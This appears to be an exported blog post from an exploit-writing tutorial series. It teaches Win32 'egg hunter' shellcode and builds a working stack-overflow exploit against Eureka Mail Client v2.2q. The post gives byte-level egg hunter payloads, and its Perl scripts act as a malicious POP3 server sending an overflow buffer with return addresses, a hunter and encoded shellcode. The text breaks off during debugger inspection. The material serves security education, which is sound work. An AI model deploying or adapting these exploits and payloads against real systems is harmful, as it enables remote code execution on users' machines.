{"id":2677,"date":"2010-01-09T19:57:00","date_gmt":"2010-01-09T18:57:00","guid":{"rendered":"http:\/\/www.corelan.be:8800\/?p=2677"},"modified":"2010-01-09T19:57:00","modified_gmt":"2010-01-09T18:57:00","slug":"exploit-writing-tutorial-part-8-win32-egg-hunting","status":"publish","type":"post","link":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/","title":{"rendered":"Exploit writing tutorial part 8 : Win32 Egg Hunting"},"content":{"rendered":"

Introduction<\/h3>\n

Easter is still far away, so this is probably the right time to talk about ways to hunting for eggs (so you would be prepared when the easter bunny brings you another 0day vulnerability)<\/p>\n

In the first parts of this exploit writing tutorial series, we have talked about stack based overflows and how they can lead to arbitrary code execution. In all of the exploits that we have built so far, the location of where the shellcode is placed is more or less static and\/or could be referenced by using a register (instead of a hardcoded stack address), taking care of stability and reliability.<\/p>\n

In some parts of the series, I have talked about various techniques to jump to shellcode, including techniques that would use one or more trampolines to get to the shellcode.\u00a0 In every example that was used to demonstrate this, the size of the available memory space on the stack was big enough to fit our entire shellcode.<\/p>\n

What if the available buffer size is too small to squeeze the entire shellcode into ? Well, a technique called egg hunting may help us out here. Egg hunting is a technique that can be categorized as \u201cstaged shellcode<\/a>\u201d, and it basically allows you to use a small amount of custom shellcode to find your actual (bigger) shellcode (the \u201cegg\u201d) by searching for the final shellcode in memory.\u00a0 In other words, first a small amount of code is executed, which then tries to find the real shellcode and executes it.<\/p>\n

There are 3 conditions that are important in order for this technique to work<\/p>\n

1. You must be able to jump to (jmp, call, push\/ret) & execute \u201csome\u201d<\/em> shellcode.\u00a0 The amount of available buffer space can be relatively small, because it will only contain the so-called \u201cegg hunter\u201d.\u00a0 The egg hunter code must be available in a predictable location (so you can reliably jump to it & execute it)<\/p>\n

2. The final shellcode must be available somewhere in memory (stack\/heap\/\u2026).<\/p>\n

3. You must \u201ctag\u201d or prepend the final shellcode with a unique string\/marker\/tag. The initial shellcode (the small \u201cegg hunter\u201d) will step through memory, looking for this marker. When it finds it, it will start executing the code that is placed right after the marker using a jmp or call instruction.\u00a0 This means that you will have to define the marker in the egg hunter code, and also write it just in front of the actual shellcode.<\/p>\n

Searching memory is quite processor intensive and can take a while.\u00a0 So when using an egg hunter, you will notice that<\/p>\n

- for a moment (while memory is searched) all CPU memory is taken.<\/p>\n

- it can take a while before the shellcode is executed. (imagine you have 3Gb or RAM)<\/p><\/blockquote>\n

 <\/p>\n

History & Basic Techniques<\/h3>\n

Only a small number of manuals have been written on this subject :\u00a0 Skape wrote this excellent paper<\/a> a while ago, and you can also find some good info on heap-only egg hunting here<\/a>.<\/p>\n

Skape\u2019s document really is the best reference on egg hunting that can be found on the internet. It contains a number of techniques and examples for Linux and Windows, and clearly explains how egg hunting works, and how memory can be searched in a safe way.<\/p>\n

I\u2019m not going to repeat the technical details behind egg hunting here, because skape\u2019s document is well detailed and speaks for itself.\u00a0 I\u2019ll just use a couple of examples on how to implement them in stack based overflows.<\/p>\n

You just have to remember :<\/p>\n

- The marker needs to be unique (Usually you need to define the tag as 4 bytes inside the egg hunter, and 2 times (2 times right after each other, so 8 bytes) prepended to the actual shellcode.<\/p>\n

- You\u2019ll have to test which technique to search memory works for a particular exploit.\u00a0 (NTAccessCheckAndAuditAlarm seems to work best on my system)<\/p>\n

- Each technique requires a given number of available space to host the egg hunter code :<\/p>\n

the SEH technique uses about 60 bytes, the IsBadReadPtr requires 37 bytes, the NtDisplayString method uses 32 bytes.\u00a0 (This last technique only works on NT derived versions of Windows. The others should work on Windows 9x as well.)<\/p>\n

 <\/p>\n

Egg hunter code<\/h3>\n

As explained above, skape has outlined 3 different egg hunting techniques for Windows based exploits.\u00a0 Again, I\u2019m not going to explain the exact reasoning behind the egg hunters, I\u2019m just going to provide you with the code needed to implement an egg hunter.<\/p>\n

The decision to use a particular egg hunter is based on<\/p>\n

- available buffer size to run the egg hunter<\/p>\n

- whether a certain technique for searching through memory works on your machine or for a given exploit or not. You just need to test.<\/p>\n

Egg hunter using SEH injection<\/h4>\n

Egg hunter size = 60 bytes, Egg size = 8 bytes<\/p>\n

EB21       jmp short 0x23\n59         pop<\/span> ecx\nB890509050<\/span><\/strong> mov eax,0x50905090<\/span><\/strong>\u00a0 ; this is the tag<\/span><\/strong>\n51         push<\/span> ecx\n6AFF       push<\/span> byte -0x1\n33DB       xor ebx,ebx\n648923     mov [fs:ebx],esp\n6A02       push<\/span> byte +0x2\n59         pop<\/span> ecx\n8BFB       mov edi,ebx\nF3AF       repe scasd\n7507       jnz 0x20\nFFE7       jmp edi\n6681CBFF0F or bx,0xfff\n43         inc ebx\nEBED       jmp short 0x10\nE8DAFFFFFF call 0x2\n6A0C       push<\/span> byte +0xc\n59         pop<\/span> ecx\n8B040C     mov eax,[esp+ecx]\nB1B8       mov cl,0xb8\n83040806   add dword [eax+ecx],byte +0x6\n58         pop<\/span> eax\n83C410     add esp,byte+0x10\n50         push<\/span> eax\n33C0       xor eax,eax\nC3         ret<\/pre>\n
In order to use this egg hunter, your egg hunter payload must look like this :<\/p>\n
my<\/span> $egghunter = \"\\xeb\\x21\\x59\\xb8<\/span>\".\n\"w00t<\/span>\".\n\"\\x51\\x6a\\xff\\x33\\xdb\\x64\\x89\\x23\\x6a\\x02\\x59\\x8b\\xfb<\/span>\".\n\"\\xf3\\xaf\\x75\\x07\\xff\\xe7\\x66\\x81\\xcb\\xff\\x0f\\x43\\xeb<\/span>\".\n\"\\xed\\xe8\\xda\\xff\\xff\\xff\\x6a\\x0c\\x59\\x8b\\x04\\x0c\\xb1<\/span>\".\n\"\\xb8\\x83\\x04\\x08\\x06\\x58\\x83\\xc4\\x10\\x50\\x33\\xc0\\xc3<\/span>\";<\/pre>\n
(where w00t is the tag. You could write w00t as \"\\x77\\x30\\x30\\x74\" as well)<\/p>\n
Note : the SEH injection technique will probably become obsolete, as SafeSeh mechanisms are becoming the de facto standard in newer OS\u2019s and Service Packs. So if you need to use an egg hunter on XP SP3, Vista, Win7\u2026, you\u2019ll either have to bypass safeseh one way or another, or use a different egg hunter technique (see below)<\/p>\n
 <\/p>\n
Egg hunter using IsBadReadPtr<\/h4>\n
Egg hunter size = 37 bytes, Egg size = 8 bytes<\/p>\n
33DB       xor ebx,ebx\n6681CBFF0F or bx,0xfff\n43         inc ebx\n6A08       push<\/span> byte +0x8\n53         push<\/span> ebx\nB80D5BE777 mov eax,0x77e75b0d\nFFD0       call eax\n85C0       test eax,eax\n75EC       jnz 0x2\nB890509050<\/span><\/strong> mov eax,0x50905090 ; this is the tag<\/span><\/strong>\n8BFB       mov edi,ebx\nAF         scasd\n75E7       jnz 0x7\nAF         scasd\n75E4       jnz0x7\nFFE7       jmp edi<\/pre>\n
Egg hunter payload :<\/p>\n
my<\/span> $egghunter = \"\\x33\\xdb\\x66\\x81\\xcb\\xff\\x0f\\x43\\x6a\\x08<\/span>\".\n\"\\x53\\xb8\\x0d\\x5b\\xe7\\x77\\xff\\xd0\\x85\\xc0\\x75\\xec\\xb8<\/span>\".\n\"w00t<\/span>\".\n\"\\x8b\\xfb\\xaf\\x75\\xe7\\xaf\\x75\\xe4\\xff\\xe7<\/span>\";<\/pre>\n
 <\/p>\n
 <\/p>\n
Egg hunter using NtDisplayString<\/h4>\n
Egg hunter size = 32 bytes, Egg size = 8 bytes<\/p>\n
6681CAFF0F  or dx,0x0fff\n42          inc edx\n52          push<\/span> edx\n6A43        push<\/span> byte +0x43\n58          pop<\/span> eax\nCD2E        int<\/span> 0x2e\n3C05        cmp al,0x5\n5A          pop<\/span> edx\n74EF        jz 0x0\nB890509050<\/span><\/strong>  mov eax,0x50905090 <\/span><\/strong> ; this is the tag<\/span><\/strong>\n8BFA        mov edi,edx\nAF          scasd\n75EA        jnz 0x5\nAF          scasd\n75E7        jnz 0x5\nFFE7        jmp edi<\/pre>\n
Egg hunter payload :<\/p>\n
my<\/span> $egghunter =\n\"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x43\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\".\n\"w00t<\/span>\".\n\"\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\";<\/pre>\n
or, as seen in Immunity :<\/p>\n
\"image\"<\/a><\/p>\n
 <\/p>\n
Egg hunter using NtAccessCheck (AndAuditAlarm)<\/h4>\n
Another egg hunter that is very similar to the NtDisplayString hunter is this one :<\/p>\n
my<\/span> $egghunter =\n\"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02<\/span><\/strong>\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\".\n\"\\x77\\x30\\x30\\x74<\/span>\". # this is the marker\/tag: w00t\n\"\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\";<\/pre>\n
 <\/p>\n
Brief explanation on how NtDisplayString \/ NtAccessCheckAndAuditAlarm egg hunters work<\/h4>\n
These 2 egg hunters use a similar technique, but only use a different syscall to check if an access violation occurred or not (and survive the AV)<\/p>\n
NtDisplayString prototype :<\/p>\n
NtDisplayString(\nIN PUNICODE_STRING String );<\/pre>\n
NtAccessCheckAndAuditAlarm prototype :<\/p>\n
 NtAccessCheckAndAuditAlarm(\n  IN PUNICODE_STRING      SubsystemName OPTIONAL,\n  IN HANDLE               ObjectHandle OPTIONAL,\n  IN PUNICODE_STRING      ObjectTypeName OPTIONAL,\n  IN PUNICODE_STRING      ObjectName OPTIONAL,\n  IN PSECURITY_DESCRIPTOR SecurityDescriptor,\n  IN ACCESS_MASK          DesiredAccess,\n  IN PGENERIC_MAPPING     GenericMapping,\n  IN BOOLEAN              ObjectCreation,\n  OUT PULONG              GrantedAccess,\n  OUT PULONG              AccessStatus,\n  OUT PBOOLEAN            GenerateOnClose );<\/pre>\n
(prototypes found at http:\/\/undocumented.ntinternals.net\/<\/a>)<\/p>\n
 <\/p>\n
This is what the hunter code does :<\/p>\n
6681CAFF0F  or dx,0x0fff   ; get last address in page\n42          inc edx        ; acts as a counter\n                           ;(increments the value in EDX)\n52          push edx       ; pushes edx value to the  stack\n                           ;(saves our current address on the stack)\n6A43        push byte +0x2 ; push 0x2 for NtAccessCheckAndAuditAlarm\n                           ; or 0x43 for NtDisplayString to stack\n58          pop eax        ; pop 0x2 or 0x43 into eax\n                           ; so it can be used as parameter\n                           ; to syscall - see next\nCD2E        int 0x2e       ; tell the kernel i want a do a\n                           ; syscall using previous register\n3C05        cmp al,0x5     ; check if access violation occurs\n                           ;(0xc0000005== ACCESS_VIOLATION) 5\n5A          pop edx        ; restore edx\n74EF        je xxxx        ; jmp back to start dx 0x0fffff\nB890509050  mov eax,0x50905090 ; this is the tag (egg)\n8BFA        mov edi,edx    ; set edi to our pointer\nAF          scasd          ; compare for status\n75EA        jnz xxxxxx     ; (back to inc edx) check egg found or not\nAF          scasd          ; when egg has been found\n75E7        jnz xxxxx      ; (jump back to \"inc edx\")\n                           ; if only the first egg was found\nFFE7       jmp edi         ; edi points to begin of the shellcode<\/pre>\n
(thanks Shahin Ramezany !)<\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
Implementing the egg hunter - All your w00t are belong to us !<\/h3>\n
In order to demonstrate how it works, we will use a recently discovered vulnerability<\/a> in Eureka Mail Client v2.2q, discovered by Francis Provencher. You can get a copy of the vulnerable version of this application here :<\/p>\n
[download id=53]53[\/download]<\/p>\n
Install the application. We\u2019ll configure it later on.<\/p>\n
This vulnerability gets triggered when a client connects to a POP3 server.\u00a0 If this POP3 server sends long \/\u00a0 specifically crafted\u00a0 \u201c-ERR\u201d data back to the client, the client crashes and arbitrary code can be executed.<\/p>\n
Let\u2019s build the exploit from scratch on XP SP3 English (VirtualBox).<\/p>\n
We\u2019ll use some simple lines of perl code to set up a fake POP3 server and send a string of 2000 bytes back (metasploit pattern).<\/p>\n
First of all, grab a copy of the pvefindaddr plugin<\/a> for Immunity Debugger.\u00a0 Put the plugin in the pycommands folder of Immunity and launch Immunity Debugger.<\/p>\n
Create a metasploit pattern of 2000 characters from within Immunity using the following command :<\/p>\n
!pvefindaddr pattern_create 2000<\/pre>\n
\"image\"<\/a><\/p>\n
In the Immunity Debugger application folder, a file called mspattern.txt is now created, containing the 2000 character Metasploit pattern.<\/p>\n
\"image\"<\/a><\/p>\n
Open the file and copy the string to the clipboard.<\/p>\n
Now create your exploit perl script and use the 2000 characters as payload (in $junk)<\/p>\n
use<\/span> Socket;\n#Metasploit pattern\"my $junk = \"Aa0...<\/span>\";  #paste your 2000 bytes pattern here\n\nmy<\/span> $payload=$junk;\n\n#set up listener on port 110\nmy<\/span> $port=110;\nmy<\/span> $proto=getprotobyname<\/span>('tcp');\nsocket<\/span>(SERVER,PF_INET,SOCK_STREAM,$proto);\nmy<\/span> $paddr=sockaddr_in($port,INADDR_ANY);\nbind<\/span>(SERVER,$paddr);\nlisten<\/span>(SERVER,SOMAXCONN);\nprint<\/span> \"[+] Listening on tcp port 110 [POP3]... \\n<\/span>\";\nprint<\/span> \"[+] Configure Eureka Mail Client to connect to this host\\n<\/span>\";\nmy<\/span> $client_addr;\nwhile($client_addr=accept<\/span>(CLIENT,SERVER))\n{\n  print<\/span> \"[+] Client connected, sending evil payload\\n<\/span>\";\n  while(1)\n  {\n     print<\/span> CLIENT \"-ERR <\/span>\".$payload.\"\\n<\/span>\";\n\t print<\/span> \" -> Sent <\/span>\".length<\/span>($payload).\" bytes\\n<\/span>\";\n  }\n}\nclose<\/span> CLIENT;\nprint<\/span> \"[+] Connection closed\\n<\/span>\";<\/pre>\n
 <\/p>\n
Notes :<\/p>\n
- Don\u2019t use 2000 A\u2019s or so - it\u2019s important for the sake of this tutorial to use a Metasploit pattern\u2026 Later in this tutorial, it will become clear why this is important).<\/p>\n
- If 2000 characters does not trigger the overflow\/crash, try using a Metasploit pattern of 5000 chars instead<\/p>\n
- I used a while(1) loop because the client does not crash after the first -ERR payload.\u00a0 I know, it may look better if you would figure out how many iterations are really needed to crash the client, but I like to use endless loops because they work too most of the time \ud83d\ude42<\/p>\n
Run this perl script. It should say something like this :<\/p>\n
\"image\"<\/a><\/p>\n
Now launch Eureka Mail Client. Go to \u201cOptions\u201d - \u201cConnection Settings\u201d and fill in the IP address of the host that is running the perl script as POP3 server.\u00a0 In my example, I am running the fake perl POP3 server on 192.168.0.193 so my configuration looks like this :<\/p>\n
\"image\"<\/a><\/p>\n
(you\u2019ll have to enter something under POP Username & Password, but it can be anything). Save the settings.<\/p>\n
Now attach Immunity Debugger to Eureka Email and let it run<\/p>\n
\"image\"<\/a><\/p>\n
When the client is running (with Immunity Attached), go back to Eureka Mail Client, go to \u201cFile\u201d and choose \u201cSend and receive emails\u201d<\/p>\n
\"image\"<\/a><\/p>\n
The application dies. You can stop the perl script (it will still be running - endless loop remember).\u00a0 Look at the Immunity Debugger Log and registers : \u201cAccess violation when executing [37784136]\u201d<\/p>\n
Registers look like this :<\/p>\n
\"image\"<\/a><\/p>\n
Now run the following command :<\/p>\n
!pvefindaddr suggest<\/pre>\n
Now it will become clear why I used a Metasploit pattern and not just 2000 A\u2019s.\u00a0 Upon running the !pvefindaddr suggest command, this plugin will evaluate the crash, look for Metasploit references, tries to find offsets, tries to tell what kind of exploit it is, and even tries to build example payload with the correct offsets :<\/p>\n
\"image\"<\/a><\/p>\n
Life is good \ud83d\ude42<\/p>\n
So now we know that :<\/p>\n
- it\u2019s a direct RET overwrite. RET is overwritten after 710 bytes (VirtualBox). I did notice that, depending on the length of the IP address or hostname that was used to reference the POP3 server in Eureka Email (under connection settings), the offset to overwrite RET may vary. So if you use 127.0.0.1 (which is 4 bytes shorter than 192.168.0.193), the offset will be 714). There is a way to make the exploit generic : get the length of the local IP (because that is where the Eureka Mail Client will connect to) and calculate the offset size based on the length of the IP.\u00a0\u00a0 (723 - length of IP)<\/p>\n
- both ESP and EDI contain a reference to the shellcode. ESP after 714 bytes and EDI points to an offset of 991 bytes. (again, modify offsets according to what you find on your own system)<\/p>\n
So far so good.\u00a0 We could jump to EDI or to ESP.<\/p>\n
ESP points to an address on the stack (0x0012cd6c) and EDI points to an address in the .data section of the application (0x00473678 - see memory map).<\/p>\n
\"image\"<\/a><\/p>\n
If we look at ESP, we can see that we only have a limited amount of shellcode space available :<\/p>\n
\"image\"<\/a><\/p>\n
Of course, you could jump to ESP, and write jumpback code at ESP so you could use a large part of the buffer before overwriting RET.\u00a0 But you will still only have something like 700 bytes of space (which is ok to spawn calc and do some other basic stuff\u2026 ).<\/p>\n
Jumping to EDI may work too. Use the \u2018!pvefindaddr j edi\u2019 to find all \u201cjump edi\u201d trampolines. (All addresses are written to file j.txt). I\u2019ll use 0x7E47B533 (from user32.dll on XP SP3). Change the script & test if this normal direct RET overwrite exploit would work :<\/p>\n
use<\/span> Socket;\n#fill out the local<\/span> IP or hostname\n#which is used by Eureka EMail as POP<\/span>3 server\n#note : must be exact match !\nmy<\/span> $localserver = \"192.168.0.193<\/span>\";\n#calculate offset<\/span> to EIP\nmy<\/span> $junk = \"A<\/span>\" x (723 - length<\/span>($localserver));\n\nmy<\/span> $ret=pack<\/span>('V',0x7E47B533);  #jmp edi from user32.dll XP SP3\nmy<\/span> $padding = \"\\x90<\/span>\" x 277;\n\n#calc.exe\nmy<\/span> $shellcode=\"\\x89\\xe2\\xda\\xc1\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49<\/span>\" .\n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56<\/span>\" .\n\"\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41<\/span>\" .\n\"\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42<\/span>\" .\n\"\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a<\/span>\" .\n\"\\x48\\x50\\x44\\x43\\x30\\x43\\x30\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47<\/span>\" .\n\"\\x4c\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x43\\x48\\x45\\x51\\x4a\\x4f\\x4c<\/span>\" .\n\"\\x4b\\x50\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a<\/span>\" .\n\"\\x4b\\x51\\x59\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x50<\/span>\" .\n\"\\x31\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x43\\x44\\x43<\/span>\" .\n\"\\x37\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4a<\/span>\" .\n\"\\x54\\x47\\x4b\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55\\x4b\\x55\\x4c<\/span>\" .\n\"\\x4b\\x51\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44<\/span>\" .\n\"\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x4c<\/span>\" .\n\"\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x47<\/span>\" .\n\"\\x54\\x43\\x34\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x50<\/span>\" .\n\"\\x56\\x45\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44<\/span>\" .\n\"\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x43<\/span>\" .\n\"\\x38\\x4b\\x39\\x4a\\x58\\x4c\\x43\\x49\\x50\\x42\\x4a\\x50\\x50\\x42<\/span>\" .\n\"\\x48\\x4c\\x30\\x4d\\x5a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b<\/span>\" .\n\"\\x4e\\x4d\\x5a\\x44\\x4e\\x46\\x37\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x45<\/span>\" .\n\"\\x31\\x42\\x4c\\x42\\x43\\x45\\x50\\x41\\x41<\/span>\";\n\nmy<\/span> $payload=$junk.$ret.$padding.$shellcode;\n\n#set up listener on port 110\nmy<\/span> $port=110;\nmy<\/span> $proto=getprotobyname<\/span>('tcp');\nsocket<\/span>(SERVER,PF_INET,SOCK_STREAM,$proto);\nmy<\/span> $paddr=sockaddr_in($port,INADDR_ANY);\nbind<\/span>(SERVER,$paddr);\nlisten<\/span>(SERVER,SOMAXCONN);\nprint<\/span> \"[+] Listening on tcp port 110 [POP3]... \\n<\/span>\";\nprint<\/span> \"[+] Configure Eureka Mail Client to connect to this host\\n<\/span>\";\nmy<\/span> $client_addr;\nwhile($client_addr=accept<\/span>(CLIENT,SERVER))\n{\n  print<\/span> \"[+] Client connected, sending evil payload\\n<\/span>\";\n  while(1)\n  {\n     print<\/span> CLIENT \"-ERR <\/span>\".$payload.\"\\n<\/span>\";\n\t print<\/span> \" -> Sent <\/span>\".length<\/span>($payload).\" bytes\\n<\/span>\";\n  }\n}\nclose<\/span> CLIENT;\nprint<\/span> \"[+] Connection closed\\n<\/span>\";<\/pre>\n
Attach Immunity to Eureka, and set a breakpoint at 0x7E47B533 (jmp edi).<\/p>\n
Trigger the exploit. Immunity breaks at jmp edi. When we look at the registers now, instead of finding our shellcode at EDI, we see A\u2019s. That\u2019s not what we have expected, but it\u2019s still ok, because we control the A\u2019s.\u00a0 This scenario, however, would be more or less the same as when using jmp esp : we would only have about 700 bytes of space. (Alternatively, of course, you could use nops instead of A\u2019s, and write a short jump just before RET is overwritten. Then place the shellcode directly after overwrite RET and it should work too.)<\/p>\n
\"image\"<\/a><\/p>\n
But let\u2019s do it the \u201chard\u201d way this time, just to demonstrate that it works.\u00a0 Even though we see A\u2019s where we may have expected to see shellcode, our shellcode is still placed somewhere in memory. If we look a little bit further, we can see our shellcode at 0x00473992 :<\/p>\n
\"image\"<\/a><\/p>\n
This address may not be static\u2026 so let\u2019s make the exploit more dynamic and use an egg hunter to find and execute the shellcode.<\/p>\n
We\u2019ll use an initial jmp to esp (because esp is only 714 bytes away), put our egg hunter at esp, then write some padding, and then place our real shellcode (prepended with the marker)\u2026 Then no matter where our shellcode is placed, the egg hunter should find & execute it.<\/p>\n
The egg hunter code (I\u2019m using the NtAccessCheckAndAuditAlarm method in this example) looks like this :<\/p>\n
my<\/span> $egghunter =\n\"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\".\n\"\\x77\\x30\\x30\\x74<\/span>\". # this is the marker\/tag: w00t\n\"\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\";<\/pre>\n
The tag used in this example is the string w00t.\u00a0 This 32 byte shellcode will search memory for \u201cw00tw00t\u201d and execute the code just behind it.\u00a0 This is the code that needs to be placed at esp.<\/p>\n
When we write our shellcode in the payload, we need to prepend it with w00tw00t (= 2 times the tag - after all, just looking for a single instance of the egg would probably result in finding the second part of egg hunter itself, and not the shellcode)<\/p>\n
First, locate jump esp (!pvefindaddr j esp). I\u2019ll use 0x7E47BCAF (jmp esp) from user32.dll (XP SP3).<\/p>\n
Change the exploit script so the payload does this :<\/p>\n
- overwrite EIP after 710 bytes with jmp esp<\/p>\n
- put the $egghunter at ESP.\u00a0 The egghunter will look for \u201cw00tw00t\u201d<\/p>\n
- add some padding (could be anything\u2026 nops, A\u2019s\u2026 as long as you don\u2019t use w00t \ud83d\ude42 )<\/p>\n
- prepend \u201cw00tw00t\u201d before the real shellcode<\/p>\n
- write the real shellcode<\/p>\n
use<\/span> Socket;\n#fill out the local<\/span> IP or hostname\n#which is used by Eureka EMail as POP<\/span>3 server\n#note : must be exact match !\n\nmy<\/span> $localserver = \"192.168.0.193<\/span>\";\n#calculate offset<\/span> to EIP\nmy<\/span> $junk = \"A<\/span>\" x (723 - length<\/span>($localserver));\nmy<\/span> $ret=pack<\/span>('V',0x7E47BCAF); #jmp esp from user32.dll\nmy<\/span> $padding = \"\\x90<\/span>\" x 1000;\nmy<\/span> $egghunter = \"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\".\n\"\\x77\\x30\\x30\\x74<\/span>\". # this is the marker\/tag: w00t\n\"\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\";\n\n#calc.exe\nmy<\/span> $shellcode=\"\\x89\\xe2\\xda\\xc1\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49<\/span>\" .\n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56<\/span>\" .\n\"\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41<\/span>\" .\n\"\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42<\/span>\" .\n\"\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a<\/span>\" .\n\"\\x48\\x50\\x44\\x43\\x30\\x43\\x30\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47<\/span>\" .\n\"\\x4c\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x43\\x48\\x45\\x51\\x4a\\x4f\\x4c<\/span>\" .\n\"\\x4b\\x50\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a<\/span>\" .\n\"\\x4b\\x51\\x59\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x50<\/span>\" .\n\"\\x31\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x43\\x44\\x43<\/span>\" .\n\"\\x37\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4a<\/span>\" .\n\"\\x54\\x47\\x4b\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55\\x4b\\x55\\x4c<\/span>\" .\n\"\\x4b\\x51\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44<\/span>\" .\n\"\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x4c<\/span>\" .\n\"\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x47<\/span>\" .\n\"\\x54\\x43\\x34\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x50<\/span>\" .\n\"\\x56\\x45\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44<\/span>\" .\n\"\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x43<\/span>\" .\n\"\\x38\\x4b\\x39\\x4a\\x58\\x4c\\x43\\x49\\x50\\x42\\x4a\\x50\\x50\\x42<\/span>\" .\n\"\\x48\\x4c\\x30\\x4d\\x5a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b<\/span>\" .\n\"\\x4e\\x4d\\x5a\\x44\\x4e\\x46\\x37\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x45<\/span>\" .\n\"\\x31\\x42\\x4c\\x42\\x43\\x45\\x50\\x41\\x41<\/span>\";\n\nmy<\/span> $payload=$junk.$ret.$egghunter.$padding.\"w00tw00t<\/span>\".$shellcode;\n\n#set up listener on port 110\nmy<\/span> $port=110;\nmy<\/span> $proto=getprotobyname<\/span>('tcp');\nsocket<\/span>(SERVER,PF_INET,SOCK_STREAM,$proto);\nmy<\/span> $paddr=sockaddr_in($port,INADDR_ANY);\nbind<\/span>(SERVER,$paddr);\nlisten<\/span>(SERVER,SOMAXCONN);\nprint<\/span> \"[+] Listening on tcp port 110 [POP3]... \\n<\/span>\";\nprint<\/span> \"[+] Configure Eureka Mail Client to connect to this host\\n<\/span>\";\nmy<\/span> $client_addr;\nwhile($client_addr=accept<\/span>(CLIENT,SERVER))\n{\n  print<\/span> \"[+] Client connected, sending evil payload\\n<\/span>\";\n  while(1)\n  {\n     print<\/span> CLIENT \"-ERR <\/span>\".$payload.\"\\n<\/span>\";\n\t print<\/span> \" -> Sent <\/span>\".length<\/span>($payload).\" bytes\\n<\/span>\";\n  }\n}\nclose<\/span> CLIENT;\nprint<\/span> \"[+] Connection closed\\n<\/span>\";<\/pre>\n
 <\/p>\n
Attach Immunity to Eureka Mail, and set a breakpoint at 0x7E47BCAF. Continue to run Eureka Email.<\/p>\n
Trigger the exploit. Immunity will break at the jmp esp breakpoint.<\/p>\n
Now look at esp (before the jump is made) :<\/p>\n
We can see our egghunter at 0x0012cd6c<\/p>\n
At 0x12cd7d (mov eax,74303077), we find our string w00t.<\/p>\n
\"image\"<\/a><\/p>\n
